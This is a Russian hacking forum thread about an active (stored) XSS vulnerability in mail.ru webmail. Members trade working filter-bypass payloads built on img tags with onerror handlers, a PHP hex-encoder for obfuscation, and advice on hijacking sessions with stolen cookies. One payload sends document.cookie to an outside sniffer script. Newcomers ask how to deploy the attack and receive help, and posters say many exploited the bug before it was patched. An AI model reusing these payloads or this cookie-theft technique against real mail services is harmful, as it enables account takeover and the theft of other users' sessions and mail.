Активная XSS на mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by Dronga, 4 Dec 2005.

  1. PSalm69

    PSalm69 [ радиоверсия ]

    Joined:
    12 Jul 2005
    Messages:
    891
    Likes Received:
    300
    Reputations:
    530
    Скажу более... если ента тема протолкнётся дальше в одном из мыльников, то пипец ваще будет. Правда там с кодировкой надо поиграть. Ваще Дронга молодца! В копилке XSS на мыльниках от тебя (кажись и от МАЙОРа) +1
     
  2. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Хех дронга XSS не работает на yandex'e так что прикольно что нашёл на яндексе. Блин я так старался видео сделать что мне не кто не что не добавят. А воще я так и предполагал что гринам,модерам,админам,Мемберам. Не будет это интересно потому что они самые умные =))
     
  3. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    ахаха, джордан - гений, поставлю репу, если напишешь в форуме ну хотя б в этом разделе отдельный топик...

    простейший hex-encoder:
    PHP:
    <?
    $str str_replace("%20"""$QUERY_STRING);
    for (
    $i=0$i<strlen($str); $i++)
         {
         
    $hex=dechex(ord($str[$i]));
         if (
    $str[$i]=='&') echo "$str[$i]";
         else if  (
    $str[$i]!='\\') echo "%$hex";
         }
    ?>
     
  4. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Вы своими XSS поломали оборудование на mail.ru =)))))))))))))
    ...
     
    _________________________
  5. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    ЛОЛ )))
    А какими прогами лучше отправлять письмо в ХТМЛ? Ато через веб интерфейс низя на мыл.ру (((
     
  6. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    XSS Tester неплохая прога - заюзай поиск по форуму...
    + а у меня нормально на мыло заходит... ну пока помучаем рамблер)
     
  7. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    _________________________
  8. byte57

    byte57 Elder - Старейшина

    Joined:
    22 Jan 2005
    Messages:
    568
    Likes Received:
    13
    Reputations:
    24
    вот на мэйл.ру залезть с кукой - все понятно: или CookieEditor или AccessDiver...

    - на рамблере блин в куке всего 1 значение показывает CookieEditor (ruid), когда приходит где-то 5...
    - через дайвер пробовал по рефереру зайти + кука - редиректит на rambler.ru
     
  9. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Спасибо всем за старания товарищи, бага не актуальна. Сегодня её прикрыли. Месяц она жила, думаю многие неплохо погрелись на этом. Можно конечно выложить ещё одну и я бы сделал это если бы тут умели хранить секреты. Пальцем ни в кого не тыкаю, но не очень приятно когда ко мне в асю стучатся левые люди и показывают мне мою же Xss... Делаем выводы господа. Всем ещё раз спасибо.
     
    1 person likes this.
  10. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Дронга, не отчаивайся друг. Все летает как по маслу! Админы mail.ru не такие умные люди. Щас катит всебраузеровый вариант:

    PHP:
    <img/src='http://////>>>>>\&#+39 style='display:none;&#+39 onerror=confirm()>
    тестил только что, спасибо в репе, если я помог
     
    3 people like this.
  11. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Да помог то помог, только не мне, опять всё повторится... И помоему это не для всех браузеров, сейчас погляжу. Дело в img/src - эту конструкцию не все браузеры принимают, IE на ура, а вот остальные не примут вроде.
     
  12. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    Решено спустить в общее.

    Думаю, Всем будет интересно почитать историю лома mail.ru.

    Кстати, данные ХSS работают на других менее "продвинутых" почтовиках :)
    Удачных подвигов!

    Помните, данная информация предназначена только для ознакомления. Мы не рекомендуем Вам испытывать данные XSS-эксплоиты.

    Powered by Antichat.ru
     
  13. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Наконец-то в паблике =) Сколько шуму было из этой темы. Как раз на момент её создания alsa основал АМА (пожалуй, самый закрытый на сегодня раздел) и я был первым кто в него зашел и первым моим постом в абсолютно пустом разделе стала усовершенствованная XSS. Так хотелось приписать "Первый нах!", ну вы понимаете, момент ведь исторический.

    На открытие опять-таки навел Майор, он уже всё обыграв в голове и поняв просто спросил, почему работает это:
    HTML:
     <font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))"> 
    .... И меня осенило =) Вот так всё и получается.

    HTML:
    <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> 
    Вот она работала под всеми браузерами, включая FF. Это была бомба к которой имели доступ всего 9 человек с форума =)

    Фильтр терялся когда в атрибуте натыкался на закрывающий тег знак > и после него уже не смотрел.. А с точки зрения браузера всё что в кавычках - это атрибут. Поэтому генерилась ошибка и добавив обработчик onerror мы добивались своего =) Из МОА никто не догадался, хотя всё было у них перед глазами)

    Пусть теперь все видят и знают что и как обсуждается в закрытых разделах. Ну и конечно стремятся туда. Кстати, из всего этого материала рукой подать до ещё одной активной XSS, но только под IE (Greetz to ZaCo =)

    Удачи, господа)
     
    #33 Dronga, 16 Jul 2006
    Last edited: 16 Jul 2006
    2 people like this.
  14. Зверь

    Зверь New Member

    Joined:
    18 May 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    4
    <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> ,подскажите пожалуйста,что надо вставлТь вместо xss ?
     
    1 person likes this.
  15. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Вообще вот такая запись:
    HTML:
    <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')>
    Это просто наглядно, а вариаций тут может быть куча, можете попробовать даже вот так:
    HTML:
    <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(1)>
    <img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('2')>
    <img src="http://img.mail.ru/mail/ru/images/dumb.gif	>"onerror=alert('3')>
    Просто дело вашей фантазии.

    Отвечаю на вопрос:
    HTML:
    <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=document.images[0].src="http://www.link.com/script_sniffer.php?cooki="+document.cookie;>
    Что-то около того)
     
    #35 Dronga, 16 Jul 2006
    Last edited: 16 Jul 2006
    1 person likes this.
  16. Зверь

    Зверь New Member

    Joined:
    18 May 2006
    Messages:
    16
    Likes Received:
    2
    Reputations:
    4
    Огромное СПАСИБО!!!!
     
  17. LeopardSS

    LeopardSS Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    64
    Likes Received:
    8
    Reputations:
    5
    Честно говоря надоело через хсс, кто б че нового придумал гг
     
  18. dikiismok

    dikiismok New Member

    Joined:
    28 Jul 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    .....

    Не могу понять почему не срабатывает...


    HTML:
    <img src=\"xss\" width=0 height=0 style=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\'xss\' document.cookie;this.sas=null\" alt=\'\'>
    Вот этот код после майловского фильтра...
    HTML:
    <img src=\"xss\" width=0 height=0  xstyle=\"top:expression(eval(this.sas));\" width=0 height=0  sas=\"this.src=\"xss\" document.cookie;this.sas=null\" alt=\"\">
     
    #38 dikiismok, 29 Jul 2006
    Last edited: 29 Jul 2006
  19. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    А ты не заметил, что style отфильтровался и стал xstyle?? Поэтому и не работает.
     
  20. AMbar

    AMbar New Member

    Joined:
    7 May 2006
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Не пойму, но как это все провети? не пойму отправляю письмо в вижео хтмл с кодом? обоснуйте по полочкам, плз